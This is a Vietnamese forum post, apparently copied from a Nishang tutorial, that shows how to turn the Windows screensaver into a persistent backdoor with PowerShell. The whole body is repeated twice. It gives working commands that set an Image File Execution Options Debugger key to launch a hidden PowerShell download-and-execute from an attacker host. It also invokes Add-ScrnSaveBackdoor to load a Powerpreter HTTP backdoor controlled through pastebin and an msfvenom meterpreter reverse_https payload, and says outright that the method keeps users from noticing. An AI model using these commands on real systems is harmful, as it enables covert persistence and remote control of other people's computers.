DDos
VIP Members
-
22/10/2013
-
524
-
2.191 bài viết
Sử dụng Windows Screensaver như một Backdoor với PowerShell
Trong bài viết trước, bạn đã biết cách để bypass Windows Lock Screen thông qua Flash Screensaver. Phương pháp này, tất nhiên là cần một truy cập vật lý tới máy mục tiêu. Đặc điểm này của Windows có được sử dụng cho nhiều điều thú vị hơn không cần một truy cập vật lý. Một thực tế rằng Screensaver sẽ chạy payload của chúng ta bất kể máy mục tiêu có đang ở trạng thái nghỉ, không làm việc (idle) - đây chính là nhiệm vụ của backdoor chúng ta tạo ra.
Sử dụng lệnh PowerShell cơ bản dưới dây, từ một shell, chúng ta có thể chạy một file thực thi bất kể Screensaver timeout xảy ra, giả sử rằng Screensaver đang dùng là Ribbons.scr:
PS C:\nishang> New-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ribbons.scr"
Và khi timeout xảy ra, chúng ta có một nhắc lệnh. Để nhanh chóng kiểm tra việc thực hiện củascreensaver, chúng ta có thể sử dụng MonitorES.
Sử dụng PowerShell, chúng ta có thể làm rất nhiều việc khác, ví dụ dưới đây chúng ta có thể download và thực hiện một scripts. Chúng ta có thể luôn luôn thay đỏi script trên webserver, do đó một script mới có thể được thực hiện bất kể lúc nào screensaver chạy.
PS C:\nishang> Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ribbons.scr" -Name Debugger -Value "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.254.1/Evil.ps1'))"
Bây giờ, để cho người dùng ít nghi ngờ, chúng ta có thể chạy screensaver đồng thời với command/script. Đây là quá trình tạo một backdoor - Add-ScrnSaveBackdoor.
Backdoor này sẽ đọc giá trị của Windows registry key HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE để kiểm tra sự tồn tại của Screensaver. Nếu nó không tồn tại, thì sẽ có một sự thay thế được dùng trong trường hợp này đó là C:\\Windows\System32 .
Một Debugger tới screensaver được tạo tại HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\.. Nó là giá trị của Debugger tới key này, nơi mà nó được viết payload. Một screensaver được lựa chọn mặc định sẽ được thêm payload. Khi payload được thực thi, screensaver cũng sẽ chạy.
Dòng lệnh dưới đây chỉ ra cách để dùng Add-ScrnSaverBackdoor để thuwcj hiện FireBuster từ Nishang cho Egress Testing. FireListener phải được khởi chạy trên máy tấn công:
PS C:\nishang>. .\Backdoors\Add-ScrnSaveBackdoor.ps1
PS C:\nishang> Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/FireBuster.ps1 -Arguments "FireBuster 192.168.254.1 8440-8445"
Dòng lệnh dưới đây thực hiện HTTP-Backdoor từ Powerpreter:
PS C:\nishang> Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/Powerpreter.psm1 -Arguments HTTP-Backdoor "http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis"
Và sử dụng lệnh dưới để thực hiện một meterpreter trong bộ nhớ với Powershell được đưa ra sử dụng msfvenom (./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.254.226 -f powershell) :
PS C:\nishang> Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/code_exec.ps1
Và kết quả:
Video :
[YOUTUBE]
Lưu ý:
Từ khi Microsoft giới thiệu PowerShell cho quản trị viên (Windows 8 trở lên được cài mặc định), các chuyên gia bảo mật, hacker đã và đang khai thác công cụ này như một phương pháp tấn công mới. Với powershell, bạn có thể làm nhiều thứ từ việc đưa macro vào các file office đến việc tạo backdoor... Các bạn hãy tìm hiểu về powershell nhé. Nó khá là hay và hấp dẫn.
Sử dụng lệnh PowerShell cơ bản dưới dây, từ một shell, chúng ta có thể chạy một file thực thi bất kể Screensaver timeout xảy ra, giả sử rằng Screensaver đang dùng là Ribbons.scr:
PS C:\nishang> New-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ribbons.scr"
Và khi timeout xảy ra, chúng ta có một nhắc lệnh. Để nhanh chóng kiểm tra việc thực hiện củascreensaver, chúng ta có thể sử dụng MonitorES.
Sử dụng PowerShell, chúng ta có thể làm rất nhiều việc khác, ví dụ dưới đây chúng ta có thể download và thực hiện một scripts. Chúng ta có thể luôn luôn thay đỏi script trên webserver, do đó một script mới có thể được thực hiện bất kể lúc nào screensaver chạy.
PS C:\nishang> Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ribbons.scr" -Name Debugger -Value "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.254.1/Evil.ps1'))"
Bây giờ, để cho người dùng ít nghi ngờ, chúng ta có thể chạy screensaver đồng thời với command/script. Đây là quá trình tạo một backdoor - Add-ScrnSaveBackdoor.
Backdoor này sẽ đọc giá trị của Windows registry key HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE để kiểm tra sự tồn tại của Screensaver. Nếu nó không tồn tại, thì sẽ có một sự thay thế được dùng trong trường hợp này đó là C:\\Windows\System32 .
Một Debugger tới screensaver được tạo tại HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\.. Nó là giá trị của Debugger tới key này, nơi mà nó được viết payload. Một screensaver được lựa chọn mặc định sẽ được thêm payload. Khi payload được thực thi, screensaver cũng sẽ chạy.
Dòng lệnh dưới đây chỉ ra cách để dùng Add-ScrnSaverBackdoor để thuwcj hiện FireBuster từ Nishang cho Egress Testing. FireListener phải được khởi chạy trên máy tấn công:
PS C:\nishang>. .\Backdoors\Add-ScrnSaveBackdoor.ps1
PS C:\nishang> Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/FireBuster.ps1 -Arguments "FireBuster 192.168.254.1 8440-8445"
Dòng lệnh dưới đây thực hiện HTTP-Backdoor từ Powerpreter:
PS C:\nishang> Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/Powerpreter.psm1 -Arguments HTTP-Backdoor "http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis"
Và sử dụng lệnh dưới để thực hiện một meterpreter trong bộ nhớ với Powershell được đưa ra sử dụng msfvenom (./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.254.226 -f powershell) :
PS C:\nishang> Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/code_exec.ps1
Và kết quả:
Video :
[YOUTUBE]
Lưu ý:
Từ khi Microsoft giới thiệu PowerShell cho quản trị viên (Windows 8 trở lên được cài mặc định), các chuyên gia bảo mật, hacker đã và đang khai thác công cụ này như một phương pháp tấn công mới. Với powershell, bạn có thể làm nhiều thứ từ việc đưa macro vào các file office đến việc tạo backdoor... Các bạn hãy tìm hiểu về powershell nhé. Nó khá là hay và hấp dẫn.
Chỉnh sửa lần cuối bởi người điều hành: